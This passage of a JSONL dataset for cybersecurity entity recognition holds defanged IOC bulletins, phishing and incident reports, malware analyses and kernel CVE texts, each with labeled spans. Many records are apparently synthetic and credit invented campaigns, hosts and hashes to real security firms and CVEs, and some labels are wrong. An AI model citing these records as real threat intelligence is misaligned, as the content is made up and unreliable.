c7 04 83 ac 84 e8 76 ba fc ff 41 8b 76 4c 49 8d 7e 50\n[ 150.834365] RSP: 0018:ffffaac5023739e0 EFLAGS: 00010086\n[ 150.834368] RAX: 0000000000000000 RBX: ffffffff8566a2e0 RCX: 0000000000000027\n[ 150.834370] RDX: ffff8f6a8f621688 RSI: 0000000000000001 RDI: ffff8f6a8f621680\n[ 150.834372] RBP: ffffaac502373a30 R08: 00000000000000c9 R09: ffffaac502373850\n[ 150.834373] R10: ffffaac502373848 R11: ffffffff84f46328 R12: ffffaac502373a40\n[ 150.834375] R13: ffff8f6741045330 R14: ffff8f6741a77700 R15: ffffffff84ac831b\n[ 150.834377] FS: 00007faf0fc94c00(0000) GS:ffff8f6a8f600000(0000) knlGS:0000000000000000\n[ 150.834379] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 150.834381] CR2: 00007faf0b600020 CR3: 000000010a52e000 CR4: 0000000000350ef0\n[ 150.834383] Call Trace:\n[ 150.834385] \n[ 150.834387] ? show_regs+0x6d/0x80\n[ 150.834393] ? __warn+0x8c/0x140\n[ 150.834397] ? check_unmap+0x1cc/0x930\n[ 150.834400] ? report_bug+0x193/0x1a0\n[ 150.834406] ? handle_bug+0x46/0x80\n[ 150.834410] ? exc_invalid_op+0x1d/0x80\n[ 150.834413] ? asm_exc_invalid_op+0x1f/0x30\n[ 150.834420] ? check_unmap+0x1cc/0x930\n[ 150.834425] debug_dma_unmap_page+0x86/0x90\n[ 150.834431] ? srso_return_thunk+0x5/0x5f\n[ 150.834435] \n---truncated---", "spans": {"Indicator: https://lore.kernel.org/all/04d4ab32": [[410, 450]], "Indicator: amd.com": [[480, 489]], "System: Linux kernel": [[7, 19]], "Organization: AMD": [[2483, 2486]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-57897"}} {"text": "IOC Bulletin - BlackCat Campaign:\nNetwork Indicators:\n- 67 [ . ] 110 [ . ] 105 [ . ] 51\n- 172 [ . ] 184 [ . ] 220 [ . ] 146\n- 192 [ . ] 18 [ . ] 205 [ . ] 103\n- cdnsync[ . ]io\n- dataauth[ . ]org\nURLs:\n- hxxps://cloudstorage[.]io/collect\n- hxxps://auth-node[.]top/callback\nEmail Senders:\n- it@secure-verify[ . ]net\n- noreply@mail-service[ . 
]info\nFile Indicators:\n- SHA256: 59e17639660c398276ebd6ee77804edf590f8a660040f317e59c60c3fbcf11ef\n- MD5: fff831dae3141dbd277bb4025a12a6e8\n- Drop path: C:\\Users\\admin\\Downloads\\taskhost.exe", "spans": {"Malware: BlackCat": [[15, 23]], "Indicator: 67.110.105.51": [[56, 87]], "Indicator: 172.184.220.146": [[90, 123]], "Indicator: 192.18.205.103": [[126, 158]], "Indicator: cdnsync.io": [[161, 175]], "Indicator: dataauth.org": [[178, 194]], "Indicator: https://cloudstorage.io/collect": [[203, 236]], "Indicator: https://auth-node.top/callback": [[239, 271]], "Indicator: it@secure-verify.net": [[289, 313]], "Indicator: noreply@mail-service.info": [[316, 345]], "Indicator: 59e17639660c398276ebd6ee77804edf590f8a660040f317e59c60c3fbcf11ef": [[373, 437]], "Indicator: fff831dae3141dbd277bb4025a12a6e8": [[445, 477]]}, "info": {"id": "synth_v2_01340", "source": "defanged_augment"}} {"text": "A phishing campaign impersonating Foxit Software delivers UltraVNC remote access payloads targeting users in the United States, Germany, Ukraine, and the United Kingdom. The malicious installer (MD5: a3b7c9d2e1f456789012345678abcdef) was distributed via email from noreply@foxit-update[ . ]download[ . ]com. The UltraVNC payload connects back to vnc-relay[ . ]threatinfra[ . ]net:5900 for remote desktop access.", "spans": {"Malware: UltraVNC": [[58, 66], [312, 320]], "Organization: Foxit Software": [[34, 48]], "Indicator: a3b7c9d2e1f456789012345678abcdef": [[200, 232]], "Indicator: noreply@foxit-update.download.com": [[265, 306]], "Indicator: vnc-relay.threatinfra.net": [[346, 379]]}, "info": {"id": "otx_00022", "source": "defanged_augment"}} {"text": "IOC Bulletin - PikaBot Campaign:\nNetwork Indicators:\n- 47 [ . ] 111 [ . ] 99 [ . ] 94\n- 9[.]145[.]141[.]69\n- 93 [ . ] 60 [ . ] 156 [ . ] 53\n- backuplogin[.]net\n- auth-relay[.]tech\nURLs:\n- hxxp://backupcache[.]tech/admin/config\n- hxxps://secureapi[ . ]top/download/update.exe\nEmail Senders:\n- finance@identity-verify[ . 
]cc\n- helpdesk@urgent-notice[ . ]online\nFile Indicators:\n- MD5: 7340e50df65a8e311be839b32ccad3ce\n- SHA1: cda5963b28aecea57a6ead9900f3590cb44505b8\n- Drop path: C:\\Users\\Public\\Documents\\csrss.exe", "spans": {"Malware: PikaBot": [[15, 22]], "Indicator: 47.111.99.94": [[55, 85]], "Indicator: 9.145.141.69": [[88, 106]], "Indicator: 93.60.156.53": [[109, 139]], "Indicator: backuplogin.net": [[142, 159]], "Indicator: auth-relay.tech": [[162, 179]], "Indicator: http://backupcache.tech/admin/config": [[188, 226]], "Indicator: https://secureapi.top/download/update.exe": [[229, 274]], "Indicator: finance@identity-verify.cc": [[292, 322]], "Indicator: helpdesk@urgent-notice.online": [[325, 358]], "Indicator: 7340e50df65a8e311be839b32ccad3ce": [[383, 415]], "Indicator: cda5963b28aecea57a6ead9900f3590cb44505b8": [[424, 464]]}, "info": {"id": "synth_v2_01446", "source": "defanged_augment"}} {"text": "Artifact Analysis for Meduza Stealer campaign:\nStage 1 dropper at C:\\Users\\admin\\Desktop\\payload.bin - SHA1: 93340b9f1e731f93ed5a9cb5f5152f8e364dfb95\nStage 2 loader at /tmp/chrome_helper.exe - SHA1: 37778ccf5b641ba4cfdb0ca5ee3fde52c7e46cf8\nFinal payload at /etc/cron.d/helper.sh - SHA256: 49347bcb845b29752879daf1f5526e2b7395e63e9caadea3544e9a4fe4125c73\nExfiltration module - SHA1: f5d7e7f6f12c13fd250ae24b48c055ae9300fc44\nAll stages communicated with 192[.]37[.]57[.]92. Nmap signatures detected in Stage 2.", "spans": {"Malware: Meduza Stealer": [[22, 36]], "Indicator: 93340b9f1e731f93ed5a9cb5f5152f8e364dfb95": [[109, 149]], "Indicator: 37778ccf5b641ba4cfdb0ca5ee3fde52c7e46cf8": [[199, 239]], "Indicator: 49347bcb845b29752879daf1f5526e2b7395e63e9caadea3544e9a4fe4125c73": [[289, 353]], "Indicator: f5d7e7f6f12c13fd250ae24b48c055ae9300fc44": [[382, 422]], "Indicator: 192.37.57.92": [[452, 470]]}, "info": {"id": "synth_v2_01983", "source": "defanged_augment"}} {"text": "The document exploited CVE-2012-0158 and will decode and write an executable to disk upon infection . 
They download and install an archive containing executables and trivially modified source code of the password-stealing tool Mimikatz Lite as GetPassword[ . ]exe .", "spans": {"Vulnerability: CVE-2012-0158": [[23, 36]], "Indicator: Mimikatz Lite": [[227, 240]], "Indicator: GetPassword.exe": [[244, 263]]}, "info": {"id": "cyberner_stix_train_004029", "source": "defanged_augment"}} {"text": "Artifact Analysis for FormBook campaign:\nStage 1 dropper at C:\\Program Files\\Common Files\\ntds.dit - SHA256: 8f069676fa4eea6856dad09ee2f3325d7193d707b283879c9e9c8a8ec3b06bea\nStage 2 loader at C:\\Windows\\Tasks\\lsass.dmp - MD5: 50958d154cab1e2c13b8a657234227a8\nFinal payload at C:\\Windows\\System32\\config.dat - SHA256: fe2f57354fe041d1a2b3c3399338634a82521eb32adb3a6fc94ccca2fab0c753\nExfiltration module - MD5: 6e6913527d7e4334d2fd296de7e3eb15\nAll stages communicated with 100 [ . ] 37 [ . ] 252 [ . ] 78. Merlin signatures detected in Stage 2.", "spans": {"Malware: FormBook": [[22, 30]], "Indicator: 8f069676fa4eea6856dad09ee2f3325d7193d707b283879c9e9c8a8ec3b06bea": [[109, 173]], "Indicator: 50958d154cab1e2c13b8a657234227a8": [[226, 258]], "Indicator: fe2f57354fe041d1a2b3c3399338634a82521eb32adb3a6fc94ccca2fab0c753": [[317, 381]], "Indicator: 6e6913527d7e4334d2fd296de7e3eb15": [[409, 441]], "Indicator: 100.37.252.78": [[471, 502]]}, "info": {"id": "synth_v2_01948", "source": "defanged_augment"}} {"text": "IOC Bulletin - IcedID Campaign:\nNetwork Indicators:\n- 172 [ . ] 124 [ . ] 249 [ . ] 99\n- 41[.]117[.]112[.]3\n- 192 [ . ] 183 [ . ] 123 [ . ] 154\n- loginportal[ . ]com\n- cloudsecure[.]cc\nURLs:\n- hxxps://backup-update[.]net/portal/verify\n- hxxps://backuprelay[ . ]tech/assets/js/payload.js\nEmail Senders:\n- verify@login-portal[.]tech\n- updates@credential-check[ . 
]site\nFile Indicators:\n- SHA1: 54319f215964cedf6475e53b0a57f8279d07544e\n- MD5: b871a38cd83c9274c97d9fb44f071535\n- Drop path: C:\\Users\\admin\\AppData\\Local\\Temp\\backdoor.elf", "spans": {"Malware: IcedID": [[15, 21]], "Indicator: 172.124.249.99": [[54, 86]], "Indicator: 41.117.112.3": [[89, 107]], "Indicator: 192.183.123.154": [[110, 143]], "Indicator: loginportal.com": [[146, 165]], "Indicator: cloudsecure.cc": [[168, 184]], "Indicator: hxxps://backup-update.net/portal/verify": [[193, 234]], "Indicator: https://backuprelay.tech/assets/js/payload.js": [[237, 286]], "Indicator: verify@login-portal.tech": [[304, 330]], "Indicator: updates@credential-check.site": [[333, 366]], "Indicator: 54319f215964cedf6475e53b0a57f8279d07544e": [[392, 432]], "Indicator: b871a38cd83c9274c97d9fb44f071535": [[440, 472]]}, "info": {"id": "synth_v2_01492", "source": "defanged_augment"}} {"text": "Hanieh_will_remain_abroad_and_Hamas_steps_up_in_Gaza[ . ]exe :", "spans": {"Indicator: Hanieh_will_remain_abroad_and_Hamas_steps_up_in_Gaza.exe": [[0, 60]]}, "info": {"id": "cyberner_stix_train_007829", "source": "defanged_augment"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9900 Win.Spyware.Banker-4198 not-a-virus:HEUR:RiskTool.Win32.BitCoinMiner.heur Trojan.Winlock.5377 BehavesLike[ . ]Win32[ . ]Kespo[ . ]cc Troj.W32.Delf.l4mb not-a-virus:HEUR:RiskTool.Win32.BitCoinMiner.heur Trojan:Win32/Comine.A Trojan-Downloader.Win32.Banload", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Kespo.cc": [[163, 201]]}, "info": {"id": "cyner2_train_006313", "source": "defanged_augment"}} {"text": "Additional digests with links to Chrysaor As a result of our investigation we have identified these additional Chrysaor-related apps . We believe APT40 's emphasis on maritime issues and naval technology ultimately support China 's ambition to establish a blue-water navy . 
Winnti : infestexe[.]com 2018-11-07 08:46:44 hxxps://www[.]facebook[.]com/infest.in.th . • Unauthorized network connections to MSSQL servers ( TCP/1433 ) and irregular or unauthorized authentication .", "spans": {"Malware: Chrysaor": [[33, 41]], "Malware: Chrysaor-related": [[111, 127]], "Organization: naval technology": [[187, 203]], "Indicator: infestexe.com": [[283, 298]], "Indicator: https://www.facebook.com/infest.in.th": [[319, 360]]}, "info": {"id": "cyberner_stix_train_002563", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Kaspersky GReAT identified a large-scale phishing operation. Emails originated from it@login-portal[ . ]tech and helpdesk@credential-check[.]site, spoofing legitimate services. Victims were directed to hxxp://portalstorage[ . ]dev/collect which hosted a credential harvesting page on cachegateway[.]org. A secondary link hxxp://gatewaysync[ . ]io/panel/index.html delivered REvil (SHA1: 31ebd72bfe664c2b4292d3e567df120b35f5bad1). The malware was saved to /home/user/.config/csrss.exe and established C2 with 10[.]157[.]208[.]161.", "spans": {"Organization: Kaspersky GReAT": [[26, 41]], "Indicator: it@login-portal.tech": [[110, 134]], "Indicator: helpdesk@credential-check.site": [[139, 171]], "Indicator: http://portalstorage.dev/collect": [[228, 264]], "Indicator: cachegateway.org": [[310, 328]], "Indicator: http://gatewaysync.io/panel/index.html": [[347, 389]], "Malware: REvil": [[400, 405]], "Indicator: 31ebd72bfe664c2b4292d3e567df120b35f5bad1": [[413, 453]], "Indicator: 10.157.208.161": [[534, 554]]}, "info": {"id": "synth_v2_01076", "source": "defanged_augment"}} {"text": "The downloaded file is an archive file ( [ . 
]r23 ) , that contains a Windows executable file with the same name as the PDF and with a fake Microsoft Word icon .", "spans": {"Indicator: .r23": [[41, 49]], "System: Windows": [[70, 77]], "Organization: Microsoft": [[140, 149]]}, "info": {"id": "cyberner_stix_train_005308", "source": "defanged_augment"}} {"text": "This exploration required a look at the suspect cmd[ . ]exe 's parent process , shown earlier in the investigation to be ACLIENT[ . ]EXE .", "spans": {"Indicator: cmd.exe": [[48, 59]], "Indicator: ACLIENT.EXE": [[121, 136]]}, "info": {"id": "cyberner_stix_train_003914", "source": "defanged_augment"}} {"text": "Blog Post by Cisco Talos: Tracking Aqua Blizzard's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-24328 against Microsoft Exchange deployments. The initial access vector involves spear-phishing emails from finance@auth-check[ . ]org delivering Conti. Post-compromise, the attackers deploy Hive and use Nmap for reconnaissance. C2 infrastructure includes 127[.]39[.]238[.]3 and proxy-cache[.]top. A staging server at hxxp://update-gateway[.]net/login hosts additional tooling. Key artifact: C:\\Windows\\System32\\update.dll (SHA256: 2787c9cc2a0e8a5bd5d753c78b4033124deec11e928c4fa6236d7e4f44e95bda).", "spans": {"Organization: Cisco Talos": [[13, 24]], "Vulnerability: CVE-2020-24328": [[128, 142]], "System: Microsoft Exchange": [[151, 169]], "Indicator: finance@auth-check.org": [[245, 271]], "Malware: Conti": [[283, 288]], "Malware: Hive": [[328, 332]], "Indicator: 127.39.238.3": [[393, 411]], "Indicator: proxy-cache.top": [[416, 433]], "Indicator: hxxp://update-gateway.net/login": [[455, 488]], "Indicator: 2787c9cc2a0e8a5bd5d753c78b4033124deec11e928c4fa6236d7e4f44e95bda": [[569, 633]]}, "info": {"id": "synth_v2_01604", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 172[.]242[.]119[.]16, the Sophos X-Ops IR team identified Qbot running as /tmp/dropper.ps1. 
The threat actor, believed to be OilRig, used PsExec for credential harvesting and Impacket for lateral movement. Exfiltrated data was sent to logincdn[ . ]tech and updatesync[.]club. The initial dropper (MD5: bb48b05edaab3f4f81210cdac4f1df39) was delivered via a phishing email from helpdesk@auth-check[ . ]org. A second C2 node was observed at 65 [ . ] 210 [ . ] 159 [ . ] 190, with a persistence mechanism writing to /dev/shm/dropper.ps1.", "spans": {"Indicator: 172.242.119.16": [[64, 84]], "Organization: Sophos X-Ops": [[90, 102]], "Malware: Qbot": [[122, 126]], "Indicator: logincdn.tech": [[299, 316]], "Indicator: updatesync.club": [[321, 338]], "Indicator: bb48b05edaab3f4f81210cdac4f1df39": [[366, 398]], "Indicator: helpdesk@auth-check.org": [[440, 467]], "Indicator: 65.210.159.190": [[502, 534]]}, "info": {"id": "synth_v2_00439", "source": "defanged_augment"}} {"text": "Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects EX6200v2 before 1 [ . ] 0 [ . ] 1 [ . ] 86, EX6250 before 1 [ . ] 0 [ . ] 0 [ . ] 134, EX7700 before 1[.]0[.]0[.]216, EX8000 before 1 [ . ] 0 [ . ] 1 [ . ] 232, LBR1020 before 2[.]6[.]3[.]58, LBR20 before 2[.]6[.]3[.]50, R7800 before 1[.]0[.]2[.]80, R8900 before 1[.]0[.]5[.]26, R9000 before 1[.]0[.]5[.]26, RBS50Y before 2[.]7[.]3[.]22, WNR2000v5 before 1 [ . ] 0 [ . ] 0 [ . ] 76, XR700 before 1 [ . ] 0 [ . ] 1 [ . ] 36, EX6150v2 before 1[.]0[.]1[.]98, EX7300 before 1 [ . ] 0 [ . ] 2 [ . ] 158, EX7320 before 1[.]0[.]0[.]134, RAX10 before 1[.]0[.]2[.]88, RAX120 before 1[.]2[.]0[.]16, RAX70 before 1[.]0[.]2[.]88, EX6100v2 before 1[.]0[.]1[.]98, EX6400 before 1 [ . ] 0 [ . ] 2 [ . ] 158, EX7300v2 before 1[.]0[.]0[.]134, R6700AX before 1 [ . ] 0 [ . ] 2 [ . ] 88, RAX120v2 before 1 [ . ] 2 [ . ] 0 [ . ] 16, RAX78 before 1 [ . ] 0 [ . ] 2 [ . ] 88, EX6410 before 1 [ . ] 0 [ . ] 0 [ . ] 134, RBR10 before 2 [ . ] 7 [ . ] 3 [ . ] 22, RBR20 before 2 [ . ] 7 [ . ] 3 [ . 
] 22, RBR350 before 4[.]3[.]4[.]7, RBR40 before 2 [ . ] 7 [ . ] 3 [ . ] 22, RBR50 before 2[.]7[.]3[.]22, EX6420 before 1[.]0[.]0[.]134, RBS10 before 2[.]7[.]3[.]22, RBS20 before 2 [ . ] 7 [ . ] 3 [ . ] 22, RBS350 before 4 [ . ] 3 [ . ] 4 [ . ] 7, RBS40 before 2[.]7[.]3[.]22, RBS50 before 2 [ . ] 7 [ . ] 3 [ . ] 22, EX6400v2 before 1[.]0[.]0[.]134, RBK12 before 2[.]7[.]3[.]22, RBK20 before 2 [ . ] 7 [ . ] 3 [ . ] 22, RBK352 before 4 [ . ] 3 [ . ] 4 [ . ] 7, RBK40 before 2[.]7[.]3[.]22, and RBK50 before 2[.]7[.]3[.]22.", "spans": {"Indicator: 1.0.1.86": [[119, 145]], "Indicator: 1.0.0.134": [[161, 188], [616, 631], [812, 827], [971, 998], [1195, 1210], [1409, 1424]], "Indicator: 1.0.0.216": [[204, 219]], "Indicator: 1.0.1.232": [[235, 262]], "Indicator: 2.6.3.58": [[279, 293]], "Indicator: 2.6.3.50": [[308, 322]], "Indicator: 1.0.2.80": [[337, 351]], "Indicator: 1.0.5.26": [[366, 380], [395, 409]], "Indicator: 2.7.3.22": [[425, 439], [1013, 1039], [1054, 1080], [1124, 1150], [1165, 1179], [1225, 1239], [1254, 1280], [1336, 1350], [1365, 1391], [1439, 1453], [1468, 1494], [1550, 1564], [1583, 1597]], "Indicator: 1.0.0.76": [[458, 484]], "Indicator: 1.0.1.36": [[499, 525]], "Indicator: 1.0.1.98": [[543, 557], [737, 751]], "Indicator: 1.0.2.158": [[573, 600], [767, 794]], "Indicator: 1.0.2.88": [[646, 660], [705, 719], [844, 870], [929, 955]], "Indicator: 1.2.0.16": [[676, 690], [888, 914]], "Indicator: 4.3.4.7": [[1096, 1109], [1296, 1321], [1510, 1535]], "Vulnerability: command injection": [[40, 57]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-45619"}} {"text": "PLEAD also dabbled with a short-lived , fileless version of their malware when it obtained an exploit for a Flash vulnerability ( CVE-2015-5119 ) that was leaked during the Hacking Team breach . 
The attackers behind observed activity in 2018 operate from the Xicheng District of Beijing via the net block 221[.]216[.]0[.]0/13 .", "spans": {"Vulnerability: Flash vulnerability": [[108, 127]], "Vulnerability: CVE-2015-5119": [[130, 143]], "Indicator: 221.216.0.0": [[305, 322]]}, "info": {"id": "cyberner_stix_train_005956", "source": "defanged_augment"}} {"text": "In this latest incident , the group registered a fake news domain , timesofindiaa[ . ]in , on May 18 , 2016 , and then used it to send spear phishing emails to Indian government officials on the same day . Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability , however in late January 2018 when , paradoxically , newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability .", "spans": {"Organization: government officials": [[167, 187]], "Vulnerability: CVE-2017-0261": [[255, 268]], "Vulnerability: CVE-2015-2545": [[402, 415]], "Indicator: timesofindiaa.in": [[68, 88]]}, "info": {"id": "cyberner_stix_train_003536", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Dragos identified a large-scale phishing operation. Emails originated from finance@account-update[ . ]xyz and account@document-share[.]link, spoofing legitimate services. Victims were directed to hxxps://portalupdate[.]club/admin/config which hosted a credential harvesting page on relay-cdn[.]info. A secondary link hxxp://updatebackup[ . ]cc/download/update.exe delivered Latrodectus (SHA1: 36d70e9797459ebf70fc608d9d1f66c1dae796fc). 
The malware was saved to C:\\ProgramData\\dropper.ps1 and established C2 with 175[.]226[.]15[.]105.", "spans": {"Organization: Dragos": [[26, 32]], "Indicator: finance@account-update.xyz": [[101, 131]], "Indicator: account@document-share.link": [[136, 165]], "Indicator: https://portalupdate.club/admin/config": [[222, 262]], "Indicator: relay-cdn.info": [[308, 324]], "Indicator: hxxp://updatebackup.cc/download/update.exe": [[343, 389]], "Malware: Latrodectus": [[400, 411]], "Indicator: 36d70e9797459ebf70fc608d9d1f66c1dae796fc": [[419, 459]], "Indicator: 175.226.15.105": [[538, 558]]}, "info": {"id": "synth_v2_00967", "source": "defanged_augment"}} {"text": "Malware Analysis Report: Amadey (MD5: 97dda2ca028226f26ec9443f732caa96). Upon execution on Windows 11, the sample creates C:\\Program Files\\Common Files\\csrss.exe and injects into legitimate processes. Network analysis shows beaconing to 10[.]198[.]36[.]38 every 60 seconds and DNS queries to node-login[ . ]live. The second stage was fetched from hxxp://proxy-node[ . ]net/wp-content/uploads/doc.php and written to /var/tmp/backdoor.elf. The payload uses Sliver-style techniques for defense evasion. A secondary hash (SHA256: fd600b8a4da758a12bc2a66fac8b3b62bd3c739d2f7ee709796e0e294146f912) was extracted from the unpacked payload.", "spans": {"Malware: Amadey": [[25, 31]], "Indicator: 97dda2ca028226f26ec9443f732caa96": [[38, 70]], "System: Windows 11": [[91, 101]], "Indicator: 10.198.36.38": [[237, 255]], "Indicator: node-login.live": [[292, 311]], "Indicator: hxxp://proxy-node.net/wp-content/uploads/doc.php": [[347, 399]], "Indicator: fd600b8a4da758a12bc2a66fac8b3b62bd3c739d2f7ee709796e0e294146f912": [[526, 590]]}, "info": {"id": "synth_v2_00583", "source": "defanged_augment"}} {"text": "Feodo Tracker reports that Emotet command-and-control server at 162 [ . ] 243 [ . ] 103 [ . ] 246:8080 has been active since June 2022. 
The Emotet banking trojan continues to evolve, with recent campaigns delivering payloads via malicious email attachments. Additional QakBot C2 infrastructure was identified at 50 [ . ] 16 [ . ] 16 [ . ] 211:443 and 34[.]204[.]119[.]63:443.", "spans": {"Indicator: 162.243.103.246": [[64, 97]], "Indicator: 50.16.16.211": [[312, 342]], "Indicator: 34.204.119.63": [[351, 370]], "Malware: Emotet": [[27, 33], [140, 146]], "Malware: QakBot": [[269, 275]]}, "info": {"id": "otx_00002", "source": "defanged_augment"}} {"text": "Check Point Research published a threat intelligence report linking Turla to a new campaign exploiting CVE-2024-42717 in Apache Struts. The attackers deployed Cobalt Strike via BloodHound, establishing C2 communication with 172[.]128[.]171[.]158 and secure-update[.]online. A secondary payload was downloaded from hxxp://api-data[ . ]club/collect. The malware binary (SHA1: 9ae665d971cdbb6cc5285479f6d8d48e02c5f0a3) was dropped to /opt/app/bin/ntds.dit. Phishing emails were sent from billing@auth-check[ . ]org targeting enterprise users. A backup C2 server was identified at 12 [ . ] 53 [ . ] 26 [ . ] 237.", "spans": {"Organization: Check Point Research": [[0, 20]], "Vulnerability: CVE-2024-42717": [[103, 117]], "System: Apache Struts": [[121, 134]], "Malware: Cobalt Strike": [[159, 172]], "Indicator: 172.128.171.158": [[224, 245]], "Indicator: secure-update.online": [[250, 272]], "Indicator: http://api-data.club/collect": [[314, 346]], "Indicator: 9ae665d971cdbb6cc5285479f6d8d48e02c5f0a3": [[374, 414]], "Indicator: billing@auth-check.org": [[485, 511]], "Indicator: 12.53.26.237": [[577, 607]]}, "info": {"id": "synth_v2_00227", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed BITSAdmin artifacts at C:\\Users\\admin\\Desktop\\dropper.ps1. Memory dump analysis confirmed execution of ADFind. Registry modifications pointed to persistence via C:\\Users\\admin\\AppData\\Local\\Temp\\agent.py. 
Network forensics identified connections to 10[.]115[.]82[.]100 and relaybackup[ . ]net. Email headers traced the initial vector to info@identity-verify[.]cc. File C:\\Users\\Public\\Documents\\loader.exe (MD5: fb1997cdf75f005338ba055108262574) was identified as the initial dropper. A staging URL hxxps://storage-data[.]cc/callback resolved to 168[.]168[.]205[.]66. Secondary artifact hash: SHA1: 5688978ac750cc96f89feedf187a3f54534fda66.", "spans": {"Indicator: 10.115.82.100": [[321, 340]], "Indicator: relaybackup.net": [[345, 364]], "Indicator: info@identity-verify.cc": [[409, 434]], "Indicator: fb1997cdf75f005338ba055108262574": [[484, 516]], "Indicator: hxxps://storage-data.cc/callback": [[571, 605]], "Indicator: 168.168.205.66": [[618, 638]], "Indicator: 5688978ac750cc96f89feedf187a3f54534fda66": [[671, 711]]}, "info": {"id": "synth_v2_01187", "source": "defanged_augment"}} {"text": "Blog Post by Europol: Tracking Lazarus Group's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2021-33526 against Citrix NetScaler deployments. The initial access vector involves spear-phishing emails from info@auth-check[.]org delivering Amadey. Post-compromise, the attackers deploy Latrodectus and use Sharphound for reconnaissance. C2 infrastructure includes 10 [ . ] 63 [ . ] 11 [ . ] 202 and auth-sync[ . ]org. A staging server at hxxp://gatewaystatic[.]com/download/update.exe hosts additional tooling. 
Key artifact: /dev/shm/winlogon.exe (MD5: 946c0c961fe129f536e958f3e3bca12e).", "spans": {"Organization: Europol": [[13, 20]], "Vulnerability: CVE-2021-33526": [[124, 138]], "System: Citrix NetScaler": [[147, 163]], "Indicator: info@auth-check.org": [[239, 260]], "Malware: Amadey": [[272, 278]], "Malware: Latrodectus": [[318, 329]], "Indicator: 10.63.11.202": [[396, 426]], "Indicator: auth-sync.org": [[431, 448]], "Indicator: http://gatewaystatic.com/download/update.exe": [[470, 516]], "Indicator: 946c0c961fe129f536e958f3e3bca12e": [[585, 617]]}, "info": {"id": "synth_v2_01522", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Check Point Research identified a large-scale phishing operation. Emails originated from helpdesk@login-portal[.]tech and account@account-update[ . ]xyz, spoofing legitimate services. Victims were directed to hxxps://login-login[.]info/login which hosted a credential harvesting page on cdn-mail[ . ]site. A secondary link hxxp://datacache[.]org/admin/config delivered BlackCat (SHA256: 5fea0499e94cdcafd3ca229afda628f5eb42f515a3ce70caf95e816442ab66c6). The malware was saved to C:\\Users\\Public\\Documents\\implant.so and established C2 with 10[.]58[.]106[.]66.", "spans": {"Organization: Check Point Research": [[26, 46]], "Indicator: helpdesk@login-portal.tech": [[115, 143]], "Indicator: account@account-update.xyz": [[148, 178]], "Indicator: hxxps://login-login.info/login": [[235, 267]], "Indicator: cdn-mail.site": [[313, 330]], "Indicator: hxxp://datacache.org/admin/config": [[349, 384]], "Malware: BlackCat": [[395, 403]], "Indicator: 5fea0499e94cdcafd3ca229afda628f5eb42f515a3ce70caf95e816442ab66c6": [[413, 477]], "Indicator: 10.58.106.66": [[566, 584]]}, "info": {"id": "synth_v2_01040", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngtp: Fix use-after-free in __gtp_encap_destroy().\n\nsyzkaller reported use-after-free in __gtp_encap_destroy(). 
[0]\n\nIt shows the same process freed sk and touched it illegally.\n\nCommit e198987e7dd7 (\"gtp: fix suspicious RCU usage\") added lock_sock()\nand release_sock() in __gtp_encap_destroy() to protect sk->sk_user_data,\nbut release_sock() is called after sock_put() releases the last refcnt.\n\n[0]:\nBUG: KASAN: slab-use-after-free in instrument_atomic_read_write include/linux/instrumented.h:96 [inline]\nBUG: KASAN: slab-use-after-free in atomic_try_cmpxchg_acquire include/linux/atomic/atomic-instrumented.h:541 [inline]\nBUG: KASAN: slab-use-after-free in queued_spin_lock include/asm-generic/qspinlock.h:111 [inline]\nBUG: KASAN: slab-use-after-free in do_raw_spin_lock include/linux/spinlock.h:186 [inline]\nBUG: KASAN: slab-use-after-free in __raw_spin_lock_bh include/linux/spinlock_api_smp.h:127 [inline]\nBUG: KASAN: slab-use-after-free in _raw_spin_lock_bh+0x75/0xe0 kernel/locking/spinlock.c:178\nWrite of size 4 at addr ffff88800dbef398 by task syz-executor.2/2401\n\nCPU: 1 PID: 2401 Comm: syz-executor.2 Not tainted 6.4.0-rc5-01219-gfa0e21fa4443 #2\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1[.]16[.]0-0-gd239552ce722-prebuilt[.]qemu[.]org 04/01/2014\nCall Trace:\n \n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x72/0xa0 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:351 [inline]\n print_report+0xcc/0x620 mm/kasan/report.c:462\n kasan_report+0xb2/0xe0 mm/kasan/report.c:572\n check_region_inline mm/kasan/generic.c:181 [inline]\n kasan_check_range+0x39/0x1c0 mm/kasan/generic.c:187\n instrument_atomic_read_write include/linux/instrumented.h:96 [inline]\n atomic_try_cmpxchg_acquire include/linux/atomic/atomic-instrumented.h:541 [inline]\n queued_spin_lock include/asm-generic/qspinlock.h:111 [inline]\n do_raw_spin_lock include/linux/spinlock.h:186 [inline]\n __raw_spin_lock_bh include/linux/spinlock_api_smp.h:127 [inline]\n _raw_spin_lock_bh+0x75/0xe0 kernel/locking/spinlock.c:178\n spin_lock_bh 
